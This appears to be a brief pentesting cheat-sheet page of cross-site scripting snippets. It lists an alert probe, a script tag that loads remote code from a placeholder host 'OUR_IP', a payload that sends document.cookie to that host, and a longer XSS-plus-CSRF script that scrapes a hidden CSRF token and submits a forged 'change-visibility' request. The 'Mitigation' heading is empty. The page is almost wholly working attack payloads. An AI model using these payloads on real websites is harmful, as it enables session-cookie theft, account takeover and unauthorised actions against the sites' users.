Cross Site Scripting
Snippets of XSS stuff
XSS
<script>alert(window.origin)</script><script src="http://OUR_IP/script.js"></script><script>new Image().src='http://OUR_IP/index.php?c='+document.cookie</script>XSS + CSRF
<script>
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/app/change-visibility',true);
req.send();
function handleResponse(d) {
var token = this.responseText.match(/name="csrf" type="hidden" value="(\w+)"/)[1];
var changeReq = new XMLHttpRequest();
changeReq.open('post', '/app/change-visibility', true);
changeReq.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
changeReq.send('csrf='+token+'&action=change');
};
</script>Mitigation
Last updated